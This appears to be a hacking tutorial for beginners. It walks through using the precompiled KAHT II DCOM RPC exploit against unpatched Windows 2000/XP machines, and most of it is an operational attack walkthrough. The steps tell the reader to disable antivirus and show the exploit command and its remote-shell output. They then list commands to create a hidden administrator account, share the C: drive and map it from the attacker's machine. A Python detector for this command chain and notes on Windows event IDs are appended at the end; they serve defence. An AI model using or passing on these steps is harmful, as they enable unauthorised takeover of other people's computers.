Now, if you're a n00b, you don't know how to compile an exploit; basically you need some programming experience, so go learn how to program. Most exploits are written in C++, so try Bloodshed Dev-C++, which you can use to compile exploits.
Read this tutorial about compiling exploits.
But you can download exploits which other people have already compiled. If someone updates their PC when new exploits come out, you can't exploit them, but if they don't update and install new patches, the chance that you can exploit them and gain access to their PC is high.
Check this example of how an exploit works:
KAHT II - MASSIVE RPC EXPLOIT
This is an exploit for Win2k/XP and it's already compiled; you can download it from the Windows Hacker exploits section.
This is an explanation of how to use it:
1. Get the target IP; make sure it uses XP or 2k.
2. Download exploit tool
(make sure to deactivate your AV)
3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101
note: 192.168.1.101 is the target
192.168.1.100 <-- the start of the range: the target's last octet minus 1
4. If successful, it will display as below:
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------
Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...
Microsoft Windows 2000 [VErsion 5.00.2195]
C:\WINNT\system32>
5. Now you are in a shell on the target's drive.
6. Then you may add a user:
C:\WINNT\system32>net user myuser mypassword /add
(myuser is the user name, mypassword the password)
7. Add the user to the Administrators group:
C:\WINNT\system32>net localgroup Administrators myuser /add
(Administrators is the target group, myuser the user)
8. Share the drive:
C:\WINNT\system32>net share c=c:
9. Exit from the target. Don't forget!
C:\WINNT\system32>exit
10. Use the shared drive; run cmd:
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C:   <--- enter myuser's password here
You will now have a mapped drive to the target PC and an administrator account on it.
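From the defender's side, the three post-exploitation commands in steps 6 to 8 (add a user, put that same user into Administrators, share a drive) are a tight, recognisable chain in process-creation logs. The Python below is an added example, not part of the original post or of the KAHT tool; the log line format, the sample lines and the 10-minute correlation window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process-creation log lines: ws01 shows the full chain,
# ws02 creates a user but then promotes a *different* account, so no alert.
SAMPLE_LOGS = [
    "2004-03-01T10:00:05 host=ws01 parent=cmd.exe cmd=net user myuser mypassword /add",
    "2004-03-01T10:00:09 host=ws01 parent=cmd.exe cmd=net localgroup Administrators myuser /add",
    "2004-03-01T10:00:15 host=ws01 parent=cmd.exe cmd=net share c=c:",
    "2004-03-01T11:30:00 host=ws02 parent=explorer.exe cmd=net user alice Pa55word /add",
    "2004-03-01T11:30:20 host=ws02 parent=explorer.exe cmd=net localgroup Administrators bob /add",
    "2004-03-01T11:30:40 host=ws02 parent=explorer.exe cmd=net share c=c:",
]
LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")
USER_ADD_RE = re.compile(r"^net\s+user\s+(?P<user>\S+)\s+\S+\s+/add\b", re.I)
ADMIN_ADD_RE = re.compile(r"^net\s+localgroup\s+administrators\s+(?P<user>\S+)\s+/add\b", re.I)
SHARE_RE = re.compile(r"^net\s+share\s+\S+=[a-z]:\\?$", re.I)  # e.g. "net share c=c:"
WINDOW = timedelta(minutes=10)  # assumption: the three steps land within 10 minutes

def parse(lines):
    """Parse lines into dicts sorted by time; lines not in the assumed format are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "host": m["host"], "cmd": m["cmd"]})
    return sorted(events, key=lambda e: e["ts"])

def find_takeover_chains(lines, window=WINDOW):
    """Alert per (host, user): user add -> same user into Administrators -> net share, within `window`."""
    alerts, by_host = [], {}
    for e in parse(lines):
        by_host.setdefault(e["host"], []).append(e)
    for host, evs in by_host.items():
        for i, e in enumerate(evs):
            m = USER_ADD_RE.match(e["cmd"])
            if not m:
                continue
            user, deadline, promoted = m["user"].lower(), e["ts"] + window, False
            for later in evs[i + 1:]:
                if later["ts"] > deadline:
                    break  # outside the correlation window, stop looking
                a = ADMIN_ADD_RE.match(later["cmd"])
                if a and a["user"].lower() == user:
                    promoted = True
                elif promoted and SHARE_RE.match(later["cmd"]):
                    alerts.append({"host": host, "user": user, "start": e["ts"].isoformat()})
                    break
    return alerts
```

On real Windows hosts the same chain is visible as Security events 4720 (user created), 4732 (member added to a local group) and 5142 (network share created), and a cmd.exe whose parent is a service host process is the shell from step 4.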